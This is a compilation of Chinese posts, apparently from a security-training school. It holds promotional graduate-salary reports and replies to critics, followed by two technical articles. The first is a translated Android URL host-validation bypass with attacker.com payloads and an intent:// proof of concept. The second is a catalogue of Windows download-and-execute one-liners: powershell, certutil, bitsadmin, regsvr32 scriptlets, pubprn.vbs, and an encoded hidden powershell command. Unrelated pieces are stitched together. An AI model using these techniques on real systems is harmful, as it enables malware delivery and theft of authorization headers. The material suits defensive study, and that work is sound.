阿玛尼的西装

​一、小数据分析

农夫四期自2019年4月1日开课,2019年10月1号毕业。至今已毕业近一月,现将就业的情况向社会通报。农夫四期学员就业薪资情况如下:

所有已就业学员,平均薪资9151.78(含二三线城市,含中专学历) 大专以上学历学员,平均薪资过万(含二三线城市) 无大学学历学员,平均薪资6607(含二三线城市) 所有学员,一线过万,二三线过8k,比例将近50% 最高薪资17000,就职于北京某互联网公司 最低薪资4500,大龄退伍兵,就职于武汉某安全公司 符合教学预期,待就业学员人数6人,其中深圳3人,北京3人 不符合教学预期6人,其中5人属于梦想班,换言之免收学费

二、老夫很满意

你觉得一个大专生,非计算机科班出身,有过一年相关工作经验,超过所有本科生,打破农夫毕业生薪资记录,得到17K的offer,这是一件容易的事情嘛?

你觉得一个三本的科班本科生,作为第一个在农夫教室明目张胆打LOL的兔崽子,被我们丧心病狂的一顿拍以后,去了500强公司,得到15K的offer,这是一件容易的事情嘛?

你觉得一个成人教育的大专生,没有任何相关工作经验,就职于某保险公司,拿到11k的offer,这是一件容易的事情嘛?

你觉得一个退伍兵,唯一能吹牛逼的资历是参与过中印边境对峙,互相扔砖头,拿到10K的offer,这是一件容易的事情嘛?

你觉得弟弟来过农夫,哥哥也来了,进农夫之前在工厂打工,出农夫之后武汉某安全公司8k的offer,这是一件容易的事情嘛?

你觉得一个未毕业的大专生,以实习生的身份去一家有上亿个人信息需要保护的公司,薪资虽然只有5500,但未来会差嘛?

人们印象中的女孩子动手能力差,但她们的薪资是15000 11000 7500(央企) 9000(乙方实验室)

学员的努力,我们的努力,换来的是挑战所谓的“不可能”,不断突破自己的上限。

三、老夫不满意

四期的就业率现今为86%左右,而这其中的一半人数,有躲在宿舍玩手机的,有去网吧刷夜的,有来了要求住单间的,几个兔崽子搞健身的,由于我们没有能力叫醒装睡的人,我们会主动放弃。

一直以来,我们实行的都是开放式的管理,教室无锁,机房无锁,毕竟都是大孩子了,都该明白一些道理,但是这些“爹”真的不是来学习的,是来给我们上课的。

在未来,所有想以实际行动,向农夫安全证明这个世界不是我们认为那么简单而单纯的学员,将会享受我们的“梦一场计划”。

这是我们极度不满意的缘由,农夫四期本来可以更好的。

当你对自己有着期许,付出了足够多的努力,老天爷都会帮助你的,最多无非就是得走流程,还没轮到你而已。但是我们不会让他们孤单的。我们会帮助他们寻找社会实践的机会,增加未来面试的成功率,有在十一期间参与”重保”的,有参加企业间的渗透比赛的。

或许下面的两张银行转账回执单更能说明问题,虽然现在没全职工作,但在农夫吃,农夫住,不要钱了。赚点外快买可乐喝,走的慢了一步而已。当重整旗鼓,我们一定不会差。

四、下狠手

四期出现了一些问题,我们会下狠手纠正过来。在新的五期的开学典礼上,我们给了所有学员立了以下规矩:

效果非常显著,免费的七天试听期,走了将近10个人。

农夫对于五期以及未来的原则就一句话:宁可全撵走,不留混日子的!

而课程方面,我们完成了新版课程的制作,细化了更多知识点的颗粒度,而对于内网渗透、提权等过去不敢讲的内容,变成了新课程体系中APT板块。而所有的工具/软件,均更新至最新版。

比如说,在第一个阶段,农夫会要求学员独立构建一整套企业的模拟架构,从设计、到实现,按照实际互联网公司搭建。而除了这个要求,我们还要求五期的学员,使用centos8及windows2019搭建,借此去锻炼学员的自我学习能力。

或许你不能理解这其中的含金量,或者这样一句话可以说明白:专业培训Linux运维的机构,现在还没农夫的新鲜呢……

更不用提四期就已经成型的等保2.0及欧盟的GDPR,乃至于第五期中,我们将会引入cisp的知识体系。下图为农夫五期特定班第一阶段整合实验某小组的设计(公司内网)

我们开办这家机构的动力来自于,能够帮助更多的年轻人能实现自己的梦想,能在正式步入社会之前,成为最强的那个自己。

我们期待的是,农夫的毕业生,拥有挑战所谓不可能的能力!未来,农夫的臭规矩会越来越多,直到把所有能对自己下狠手的都选出来。

这是农夫凌晨阶段,农夫小卖部的微信收款记录。

五、什么是我们想要的人

很多人在报名咨询的时候,会问我们需要不需要基础或者学历?

我理解成一种自我怀疑。

基础好,你好不过农夫四期的muye,大学期间就补天排名前70,来农夫的所有开销都是自己挖洞赚的。

基础好,你好不过农夫三期的运维大佬,两年多的Linux运维经验。

基础好,你好不过农夫二期的广东佬,不短的PHP经验。

学历好,你好不过农夫的985/211。他们好,但都不是就业薪水最高的!

基础差,你差不过18岁中专毕业未遂的小孩儿。

基础差,你差不过28岁的工厂打工仔。

基础差,你差不过打字一指禅的。

他们过去差,但现在不差!如果我们要求学员高考得多少分以上,那么农夫跟清华还有什么分别。

所以我们从不在意学员过去的背景及资历,我们只在乎在你离开农夫的时候,是不是那个最好的自己?

六、我们不穿西装

固然,农夫需要赚钱,同样需要盈利。没有钱,我们就没办法购买那台2万6的服务器

没有钱,我们就没办法购买那台专业级的摄像机

没有钱,我们就没办法给待就业的学员周转的空间

没有钱,我们就没办法维持一个20人的班级,三名老师的配置

但我们也从未想过成为钱串子脑袋的生意人,如果我们成了生意人,一切向钱看,那么别的机构三个月19800,而农夫的六个月,该收多少钱?

那么先学完,就业以后在还款,0利息的梦想班还能存在嘛?

那么其他的机构整个班级7000算是高工资,而农夫的均价高出近30%,学费又该收多少钱?

那么猪肉采购价已经40块一斤了,2000块钱的食宿费,京酱肉丝还吃不吃了?

其实我们可以更赚钱的,比如说我们把所有学员的就业企业的真实信息放出来,我们能收到更多的学生。

比如说我们把去长城、集体吃肉的活动照片放出来,我们能收到更多的学生。

比如说我们砍掉大量课程,也依旧课程领先,但我们的成本会更低。

比如说我们跟个高校谈谈合作,大不了给点回扣,招生也没那么费劲巴拉的,本科就业也好安排。

但我们就不!!!!!

不知道你是否思考过这样一个问题:

当你来到这个世界,很多事情的上限就注定了。

而我们想让更多的人,拥有平等的机会。

在我们看来黑了这个世界,才是真的黑客!

好吧,我承认我们没救了,注定就是一群技术屌丝所成立的地方。

为此,我们穿不了这西装,不管是阿玛尼还是阿尼玛,您哪来回哪去吧。

70年生日快乐,祝愿我们伟大的祖国今后繁荣昌盛,国力富强!!

五千年前我们和埃及人一样面对洪水,四千年前我们和古巴比伦人一样玩着青铜器,三千年前我们和希腊人一样思考哲学,两千年前我们和罗马人一样四处征战,一千年前我们和阿拉伯人一样无比富足,而现在我们和美利坚人一较长短,五千年来我们一直在世界的牌桌上,而我们的对手却已经换了好几轮。

70年生日快乐,祝愿我们伟大的祖国今后繁荣昌盛,国力富强!!

致这个多事之秋

农夫最近总是不顺利,总被莫名的被卷入到是非当中。从早些时候的知乎匿名黑。

百度的关键字都被人买了

到现在实名的嘲笑

由于不了解我们以及对培训的偏见,算上一些不靠谱的因素,所以还是远程做个回复吧。

To:世纪佳缘安全工程师
先回复您的消息,是我觉得篇幅相对会更少。
您放出的简历模板是我们四期的简历模板,这段内容是我们防御篇整合实验的内容。
另外我们培训的周期是六个月,正常维度是在5.5个月,而并非三四个月的时间。
我不知道您是否面试过农夫的学员,实际上学员的能力在真实的工作表现会有差距,而且还很大。
如果贵公司需要优等货,可以在大概五个月以后提前预定个更合适的。现在这些基本都是卖剩下的:)
如果您认为我们整合实验这段内容是虚假编写的,那么我真心邀请您于5个月以后参与我们的防御整合实验的答辩。这个过程我们会要求学员给我们展示这套基于开源建立的防御体系。
来往打车费农夫出,管饭!
另外个人有些建议,如有得罪还请见谅。
第一,作为一名甲方的安全从业者,低调是一个可贵的品质,若是不去了解,人云亦云,这其实并不利于个人日后的成长。
第二,同样的时间,可以做不同的选择,例如发这条朋友圈的时间,将贵公司的SRC链接发到一些安全群,也不至于src只有一个人提交过漏洞。当然也可能是真安全。

To:赵先生
在我们最初设计课程的时候,是在2017年。
而世纪佳缘的白帽子事件,是在2016年。
相信您作为国内知名白帽团队的成员,对那段时光的风声鹤唳还有印象。
另外在我们的眼中,甲方招人,要的是安全能落地,乙方招人,要的是满足甲方的需要。
在课程的设计上,我们还需要考虑更多的因素,比如学员就业方向能否更宽以及未来多年以后,是否会被应届生替代。
基于这些考量,学员入学的第一天就要开始适应Linux做桌面,姑且不论windows与linux的薪资问题,起码能保证这些兔崽子不至于在教室开黑。若是光从赚钱与就业的角度来讲,似乎无所谓,毕竟基础篇的整合实验,没有一个学员在工作中给公司搭建过……
但是依旧需要讲,因为我们需要这些非科班出身的人还能有未来。
举个例子:开学的第一天,我们会拆解一台DELL的服务器,给学生讲硬件。
那么如果简单讲讲各个配件是做啥用的,将来买电脑注意哪些点似乎也是一天的课程。
但是告诉学员硬盘的4k分区,机械硬盘的工作原理,他们未来去读cissp的时候,会更轻松的理解cissp官方学习指南第七版P231的9.1.4关于存储介质的安全性的内容,如果落实到实际的工作中,起码会知道将来公司淘汰旧电脑,别直接给中关村二手商…..
所以第一个阶段,被讥讽为偏向运维,依旧不能减少,而且新版的课程还做了加强。
第二个阶段,主要是web安全以及安全工具,然后会留下一个月的实战挖洞的阶段。
但是由于这个圈子出现过的事情,自保也好,保护学生也好,我们去除了很多其他机构的标配。比如说我们没有提权,没有后渗透,上传漏洞我们连解析漏洞都不讲。实战的时候,sql注入只可以到–dbs,连–count都不许跑。不许往测试的服务器写入任何的后门等等等等。
一旦发现违规,我们会开除他。
我相信您有会这样的想法:这是什么鸡毛黑客培训?
或者把这个阶段叫为风险评估更为恰当,我们希望的是能够找到企业的风险,或许说在实际的场景中,如果构造一个攻击链条需要AB两个点,并不需要真的完成攻击,只需要告知相关人员:这个A点有问题,现在还是得修,要不然将来那个B点更新代码出了问题,那么咱们就乐子大了~
这造成的尴尬就是,在学员求职的过程中,去乙方翻车率极高,而且表现都看起来极差。
因为这款牛肉干,当初就真的不是给素食主义者设计的。
所以我们在帮助学生就业的时候,从来都不会主动去联系乙方人力资源部走那种批量面试。
现在合作的几家乙方,都是因为自由求职招聘的阶段,学员应聘成功,发现凑合还行,然后双方联系,进行交流以后再推荐,要么驻场的岗位留给我们的学员,另外就是挑选一些潜力股,比如几个月以前,打字一指禅,三个月以后,能kali熟练用,能挖到一些大厂的漏洞的学员,而且也喜欢渗透的,乙方内部再自己内部做培训后渗透阶段,乙方的项目有授权,学员的基础也还行,所以合作几家乙方关系还都算不错。
第三个阶段,就是安全防御了,就是您简历所截取的那一段。
就不多介绍了,如果不相信,依旧报销打车费与管饭。
第四个阶段,合规课程有企业安全体系的课程,还有等保及GDPR。
所以很显然的一个问题就来了,六个月的时间其实真的很紧张,这对学员的记忆力、自制力要求都很高。这导致的尴尬就是水平差距其实很大,我们在四期进行到一半的时候,就已经意识到这个问题了,毕竟第一次开梦想班,如果踢人走,也怕被人说三道四的。
所以到现在,就业的薪资都不是说差几K的,是零头的关系。最高17K,最低6K……
爱情中的两个人,如果一方永远在付出,另一方永远接受,那么由于没有任何的代价,所以未付出的反而会甩了付出的,这是人性。
梦想班不需要学员先付任何的学费,所以真的有学生不珍惜,上课偷着看NBA,半夜溜着去网吧,或者您百度下农夫的地图,就知道我们的校区离网吧有多远了……这个去网吧的毅力,留着给国足,早他妈的拿世界杯了!
第五期开始,我们会开始对毕业生的质量进行控制,未来优秀的毕业生会拿到我们的推荐信,而那些不愿意付出努力的,我们真的下狠手。
最后有一些建议给未来面试农夫学员的面试官:
农夫二期有位学生,这兔崽子上课看皇马……
很显然,他活该找不到工作。
幸运的是,第二次面试,他得到了一次陌陌面试机会,很显然他失败了。
但是他对面试官的评价很高,面试官给他了一些建议,他也发现其实面试题他如果好好学,其实是能答上来的。回来以后他暂停了找工作,真的踏踏实实的重新复习了一遍,现在混的也不错。
其实我想表达的意思是说:不论农夫学生的简历写的有多好,重复率有多高,起码做到了安全人最基本的诚信,从没有掩盖自己是新人的事实,也做好了工作以后再成长的准备。
我们有很多优秀的学生在等待着加入安全从业者的序列,他们的努力或许用这样的赌注更合适:农夫的顺义校区,任何上课的时期,凌晨12点为界限,若教室无人,你出多少赌注,我出10倍!
给他们offer,我们会替他高兴。
给他们失败,让他们知耻而后勇。
看待这个世界的目光,多那么一丝温柔,或许世界的反馈也截然不同!

# 在Android应用中绕过主机验证的小技巧

# 在Android应用中绕过主机验证的小技巧
## 反斜杠技巧

查看典型的主机验证代码:

“`
Uri uri = Uri.parse(attackerControlledString);
if(“legitimate.com”.equals(uri.getHost() || uri.getHost().endsWith(“.legitimate.com”)) {
webView.loadUrl(attackerControlledString, getAuthorizationHeaders()); // or webView.loadUrl(uri.toString())
}
“`

`android.net.Uri`和`java.net.URL`的解析器中存在问题,它们不识别校验权限部分中的反斜杠(如果你测试`java.net.URI`将显示异常)。

“`
String url = “http://attacker.com\\\\@legitimate.com/smth”;
Log.d(“Wow”, Uri.parse(url).getHost()); // legitimate.com is printed!
webView.loadUrl(url, getAuthorizationHeaders()); // attacker.com is loaded 😛
“`

## 思考

以下是相对安全的URL验证示例:

“`
Uri uri = getIntent().getData();
boolean isOurDomain = “https”.equals(uri.getScheme()) && uri.getUserInfo() == null && “legitimate.com”.equals(uri.getHost());
if(isOurDomain) {
webView.load(uri.toString(), getAuthorizationHeaders());
}
“`

`android.net.Uri`在Android平台上被广泛使用,但是如果你看一下源代码,你会发现有一个带有几个内部子类的抽象类!我发现可以使用任意部分构建自定义URI `android.net.Uri$HierarchicalUri`。代码`MainActivity.java`:

“`
public class MainActivity extends Activity {

protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);

Uri uri;
try {
Class partClass = Class.forName(“android.net.Uri$Part”);
Constructor partConstructor = partClass.getDeclaredConstructors()[0];
partConstructor.setAccessible(true);

Class pathPartClass = Class.forName(“android.net.Uri$PathPart”);
Constructor pathPartConstructor = pathPartClass.getDeclaredConstructors()[0];
pathPartConstructor.setAccessible(true);

Class hierarchicalUriClass = Class.forName(“android.net.Uri$HierarchicalUri”);
Constructor hierarchicalUriConstructor = hierarchicalUriClass.getDeclaredConstructors()[0];
hierarchicalUriConstructor.setAccessible(true);

Object authority = partConstructor.newInstance(“legitimate.com”, “legitimate.com”);
Object path = pathPartConstructor.newInstance(“@attacker.com”, “@attacker.com”);
uri = (Uri) hierarchicalUriConstructor.newInstance(“https”, authority, path, null, null);
}
catch (Exception e) {
throw new RuntimeException(e);
}

Intent intent = new Intent();
intent.setData(uri);
intent.setClass(this, TestActivity.class);
startActivity(intent);
}
}
“`

代码`TestActivity.java`:

“`
public class TestActivity extends Activity {

protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);

Uri uri = getIntent().getData();
Log.d(“Wow”, “Scheme: ” + uri.getScheme());
Log.d(“Wow”, “UserInfo: ” + uri.getUserInfo());
Log.d(“Wow”, “Host: ” + uri.getHost());
Log.d(“Wow”, “toString(): ” + uri.toString());
}
}
“`

在我的情况下,它显示:

“`
10-30 06:02:20.142 32044 32044 D Wow : Scheme: https
10-30 06:02:20.142 32044 32044 D Wow : UserInfo: null
10-30 06:02:20.142 32044 32044 D Wow : Host: legitimate.com
10-30 06:02:20.142 32044 32044 D Wow : toString(): https://[email protected]
“`

这是因为apps只解析一次url,而受害者应用程序不再解析它,但信任从不受信任的来源收到的“already parsed”URI

## 远程利用反斜杠技术

应用程序可以自动处理来自浏览器的外部链接。这可以通过注册特殊功能来完成`intent-filter`

“`
<activity android:name=”.DeeplinkActivity”>
<intent-filter android:autoVerify=”true”>
<action android:name=”android.intent.action.VIEW”/>
<category android:name=”android.intent.category.DEFAULT”/>
<category android:name=”android.intent.category.BROWSABLE”/>
<data android:scheme=”https” android:host=”legitimate.com”/>
</intent-filter>
</activity>
“`

在此步骤中,已经确认可以从第三方应用/ ADB攻击该攻击。如果您尝试创建一个远程PoC以匹配过滤器(请记住,Android也用于`parsedIntent.getData().getHost()`匹配intent-filters中定义的值)并触发错误

“`
<a href=”https://attacker.com\\@legitimate.com/”>Begin zaheck!</a>
“`

或者

“`
<a href=”https://attacker.com%5C%[email protected]/”>Begin zaheck!</a>
“`

你会注意到,在第一个例子中,所有都`\`将被替换`/`,在第二个例子中,它们将被保留编码,反斜杠技巧将不起作用。但仔细研究了`intent://`计划如何工作后,我找到了一种远程利用它的方法。简介:

https://www.mbsd.jp/Whitepaper/IntentScheme.pdf

所有反斜杠都可以保存在未更改状态,例如URI的哈希部分,这里[https://android.googlesource.com/platform/frameworks/base/+/568faa8ed90d965faf302ca60677a40a5b84bf86/core/java/android/content/Intent.java#6334](https://hackerone.com/redirect?signature=71735acdfb5134f5add5f5b183369f9bd36c3a6e&url=https%3A%2F%2Fandroid.googlesource.com%2Fplatform%2Fframeworks%2Fbase%2F%2B%2F568faa8ed90d965faf302ca60677a40a5b84bf86%2Fcore%2Fjava%2Fandroid%2Fcontent%2FIntent.java%236334)

的PoC:

“`
<a href=”intent://not_used/#Intent;scheme=https://attacker.com\\@legitimate.com/;end”>Begin zaheck!</a>
“`

在这里[https://android.googlesource.com/platform/frameworks/base/+/568faa8ed90d965faf302ca60677a40a5b84bf86/core/java/android/content/Intent.java#6436](https://hackerone.com/redirect?signature=e9fc759af32db0bc7678daac432ee2fab8835e0a&url=https%3A%2F%2Fandroid.googlesource.com%2Fplatform%2Fframeworks%2Fbase%2F%2B%2F568faa8ed90d965faf302ca60677a40a5b84bf86%2Fcore%2Fjava%2Fandroid%2Fcontent%2FIntent.java%236436) 它将等于

“`
Uri.parse(“https://attacker.com\\\\@legitimate.com/://not_used/”)
“`

攻击变得遥远!

## 缺少校验方案

如果仅验证主机值,但没有任何有效的未验证方案,则可以使用以下有效负载`javascript://`和`file://`scheme

“`
javascript://legitimate.com/%0aalert(1)//
“`

或者

“`
file://legitimate.com/sdcard/payload.html
“`

文章翻译自:https://hackerone.com/reports/431002

君子坦荡荡,小人长戚戚

君子坦荡荡,小人长戚戚

一 缘起

上午的时候,看到知乎上有人发布了这样的提问:

而后又有了这样的回答:

我们知道来事儿了,这件事情必须要做出处理,不能视而不见或者自欺欺人。

一直以来,我们期望着成为最好的安全培训机构,而我们所理解的“最好”定义如下:

每一个来学习的人,让他得到最好的成长,直至半年后凭借着自身的技能,找到一份稳定的安全工作。而学员对我们的认可与收获,是我们持续开办这家机构的动力。在我们的认知中,最好并不等于最赚钱。

在8-14号13:00的时候,我们决定按照如下的方式处理:

我们在四期的群里,公开发布了如下的信息:

我们给予这位匿名回答的人一个新的选择,就是新签署一份协议,而农夫会把学费全额退款,只需要做到一些约定,比如三小时以内买张车票回家,不泄露农夫课程信息,后来由于公开群的某位网友指出,第五条:半年的时间有霸王条款的嫌疑,所以取消掉了。

五个多月的学习,多数课程均以结束,在尚未开始找工作时,只需要学生一句话:我觉得一般般,那么全额退费,我想我们做到了最大的诚意。

但截止目前,没有任何四期的学员过来签字……

至于提问的人,也算是个回帖吧:

你原文说到:都让自己感觉有点假,感觉托有点多

我想通过我们对待不满意学员的方式,你应该能明白我们的口碑从何而来了。我们比任何地方都在意自己的口碑,所以我们有梦想班的0学费入学,而不是商业贷款,每一个学员报名试听七天结束以前,都不会收任何的占座费、报名费,留给潜在学员充足的选择权,就是为了不想被人说骗子。

你原文说到:他们发布的公开课自己也听过,个人感觉很一般的样子,没有他们说的那么好

不论你认为好与不好,事实上这是在国内,你唯一能免费获取到的立足攻防体系的课程。

在有开放课以前,想学习的年轻人需要花钱网上拜师,才能学到的所谓黑客技术,而整套的教学视频或许还没有开放课的一集时间长……或许你去做一些对比,例如把一些培训机构的课程与开放课的大纲做个对比,你会发现大纲的气质相似,而他们要收1-2万的学费。如果你去招聘网站找家互联网公司的招聘要求做个对比,你会发现企业的要求无非也就是渗透测试、安全防御、合规的要求,而在开放课中都有讲到。

你原文提到:通过咨询的得到信息也罢

我想你应该加了咨询招生号询问过问题,你不知道我们在8月9号的时候已经停止五期的招生了嘛?

如果你依旧想来学习,最快也要等到明年四月份以后了,按照现在的替补数量,肯定不会有新咨询人员的位置了……

二 额外想说的

1 有种有钱是别人以为你有钱

线下班刚开始的时候,那是国内安全培训萌芽的阶段,那个时候国内或大或小的培训机构如同雨后春笋般出来,我们从激烈的竞争中,坚持着所坚持的想法,猛然间才发现我们竟然已经成为了那个“巨头”,为了现今的口碑,我们谢绝了天使轮,选择回款速度最慢的梦想班模式。而这次的口碑事件,还不能排除是某个同行恶意的抹黑。

如果真的是同行的抹黑,那么想必同行感受到了农夫所带来的压力,请你放心,我们没赚到你想的那么多钱,有种有钱是你以为老子有钱……不过得知你过的也不好,我同样也放心了。

2 我们到底教的是什么?

这个匿名的回答中,提到的“没有提权,内网漫游的课程”是真的,我们担心学员惹祸,所以在过往的四期中,我们只提供metasploit的初级别实验用于体验,而在课堂上给予方向的指引,如果想学自己搭建实验环境即可。

所以过往的毕业生中,同样出现从事打击犯罪的工作的学员,我们建立了足够好的基础能力,自学并不是压力。

回答中没有说的,包括第四期我们新增的欧盟GDPR、等级保护2.0,数据防泄漏,我们的培训的目标是学员拥有更为全面的安全能力,以更高的维度对抗低视野。

或许这个例子更形象:

就拿这个口碑事件做个例子,假设农夫安全现在是一家公司,匿名回答的人是一个员工,而这名员工利用网络发布对公司不利的信息或者企业机密信息,那么问题来了,怎么找到他?

靠提权?靠内网漫游?靠过狗的技巧?

3 即便就只说挖洞

农夫线下班课程体系中,是有一个月实战挖洞的,是真的去SRC平台赚取赏金的。

就四期举例,实战的战绩如下:

六月顺丰SRC第一,来农夫之前纯0基础。

七月顺丰SRC,3,4,5都是农夫四期学员

6-8月份微众银行SRC,唯一一个漏洞,奖金2000

实战期间挖洞最牛的,2万的学费已经赚回来了……

就假设这匿名回答真的是四期的学生,我们也确实就教了几个破工具,那么人家为什么行?

好,不跟爷们比,咱们跟姑娘比。画魂这丫头片子你总知道吧,人家还换了张交大证书回来呢,你呢?你呢?

4 一切都是为了就业

说一千道一万,我们所做的所有事情,都是为了就业。

农夫四期4月份开班,截止到8月15号,79名学员,已经拿到offer的15人,工资从8k到15k不等。

而最多半个月以后,剩余的学员将会在社会公开招聘中进行竞争。会像疯狗一样的把最好的抢回来。

如果这件事是同行的恶意竞争,那么我们比这个吧,就业率,就业薪资,就业企业所带来的成长性等等参数。农夫毕业的所有学员,就业率100%,试用期通过率100%.

Farmsec:come on baby

XXXXXXX:jack slow fxxk(捷克斯洛伐克)

5 我们想要的

我们希望每一个农夫安全的毕业生,都有着好的前程,未来都老了,一起在TQ开的农夫烤肉店聚会的时候,回首往事,能说出一句:我们这代人真是守卫者,无名与无敌的存在。

所以哪怕学生毕业都跳槽了,我们教研组依旧是学生背后的狗头军师,这无关于钱财与口碑,只是这是我们想要的,这世上最无敌的三个字便是:我乐意。

若用一句话收尾便是这句话:

书有未曾经我读,事无不可对人言,君子坦荡荡,小人长戚戚。

渗透技巧——从github下载文件的多种方法

0x00 前言


转载地址:https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E4%BB%8Egithub%E4%B8%8B%E8%BD%BD%E6%96%87%E4%BB%B6%E7%9A%84%E5%A4%9A%E7%A7%8D%E6%96%B9%E6%B3%95/

本文源于一个有趣的问题:

已知exe文件:https://github.com/3gstudent/test/raw/master/putty.exe

Windows环境,需要将该exe释放到指定目录并执行,例如c:\download

问:通过cmd实现的最短代码是多少字符?

0x01 简介


本文将要介绍以下内容:

•通过cmd实现从github下载文件的方法汇总•选出最短代码的实现方法

0x02 分析


在之前的文章《渗透技巧——通过cmd上传文件的N种方法》对通过命令行下载文件的方法做了汇总

而github支持https协议,并不支持http协议,所以在利用上需要注意一些问题,有些方法不支持http协议

0x03 可用方法汇总


1、powershell

powershell (new-object  System.Net.WebClient).DownloadFile('https://github.com/3gstudent/test/raw/master/putty.exe','c:\download\a.exe');start-process  'c:\download\a.exe'

2、certutil

certutil -urlcache -split -f https://github.com/3gstudent/test/raw/master/putty.exe c:\download\a.exe&&c:\download\a.exe

3、bitsadmin

bitsadmin /transfer n http://github.com/3gstudent/test/raw/master/putty.exe c:\download\a.exe && c:\download\a.exe

注:

使用bitsadmin的下载速度较慢

4、regsvr32

regsvr32 /u /s /i:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec.sct scrobj.dll

原理:

regsve32->JScript->powershell->download&exec

JScript调用powershell实现下载执行的代码为:

new  ActiveXObject("WScript.Shell").Run("powershell (new-object  System.Net.WebClient).DownloadFile('https://github.com/3gstudent/test/raw/master/putty.exe','c:\\download\\a.exe');start-process  'c:\\download\\a.exe'",0,true);

参照sct文件格式:

https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct

添加功能,生成downloadexec.sct

实现功能:

regsvr32 /u /s /i:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec.sct scrobj.dll

当然,为了减少调用的程序,也可以使用以下思路:

regsve32->VBScript->download&exec

通常,vbs脚本实现的下载执行代码:

Const adTypeBinary = 1Const adSaveCreateOverWrite = 2Dim http,adoSet http = CreateObject("Msxml2.XMLHTTP")http.open "GET","http://192.168.81.192/putty.exe",Falsehttp.sendSet ado = createobject("Adodb.Stream")ado.Type = adTypeBinaryado.Openado.Write http.responseBodyado.SaveToFile "c:\download\a.exe"ado.Close

但该脚本不支持https下载,可以换用Msxml2.ServerXMLHTTP.6.0

代码如下:

Const adTypeBinary = 1Const adSaveCreateOverWrite = 2Dim http,adoSet http = CreateObject("Msxml2.ServerXMLHTTP.6.0")http.SetOption 2, 13056http.open "GET","https://github.com/3gstudent/test/raw/master/putty.exe",Falsehttp.sendSet ado = createobject("Adodb.Stream")ado.Type = adTypeBinaryado.Openado.Write http.responseBodyado.SaveToFile "c:\download\a.exe"ado.Close

注:

该思路来自@mosin @索马里海贼

也可以通过WinHttp.WinHttpRequest.5.1实现,代码如下:

Const adTypeBinary = 1Const adSaveCreateOverWrite = 2Dim http,adoSet http = CreateObject("WinHttp.WinHttpRequest.5.1")http.open "GET","https://github.com/3gstudent/test/raw/master/putty.exe",Falsehttp.sendSet ado = createobject("Adodb.Stream")ado.Type = adTypeBinaryado.Openado.Write http.responseBodyado.SaveToFile "c:\download\a.exe"ado.Close

注:

该思路来自@ogre

vbs脚本实现的执行代码

WScript.CreateObject("WScript.Shell").Run "c:\download\a.exe",0,true 

依旧是以sct文件作为模板,添加功能,生成downloadexec2.sct

实现功能:

regsvr32 /u /s /i:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec2.sct scrobj.dll

5、pubprn.vbs

利用pubprn.vbs能够执行远程服务器上的sct文件(sct文件格式有区别)

思路:

regsve32->VBScript->download&exec

代码已上传,地址为https://raw.githubusercontent.com/3gstudent/test/master/downloadexec3.sct

实现功能:

cscript /b  C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1  script:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec3.sct

当然,也可使用如下思路实现(代码略):

regsve32->JScript->powershell->download&exec

6、msiexec

该方法我之前的两篇文章《渗透测试中的msiexec》《渗透技巧——从Admin权限切换到System权限》有过介绍,细节不再赘述

首先将powershell实现下载执行的代码作base64编码:

$fileContent = "(new-object System.Net.WebClient).DownloadFile('https://github.com/3gstudent/test/raw/master/putty.exe','c:\download\a.exe');start-process 'c:\download\a.exe'"$bytes  = [System.Text.Encoding]::Unicode.GetBytes($fileContent);$encoded = [System.Convert]::ToBase64String($bytes); $encoded

得到:

KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==

完整powershell命令为:

powershell -WindowStyle Hidden -enc  KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==

完整wix文件为:

<?xml version="1.0"?><Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">  <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">    <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>    <Media Id="1" />
    <Directory Id="TARGETDIR" Name="SourceDir">      <Directory Id="ProgramFilesFolder">        <Directory Id="INSTALLLOCATION" Name="Example">          <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">               </Component>        </Directory>      </Directory>    </Directory>
    <Feature Id="DefaultFeature" Level="1">      <ComponentRef Id="ApplicationFiles"/>    </Feature>
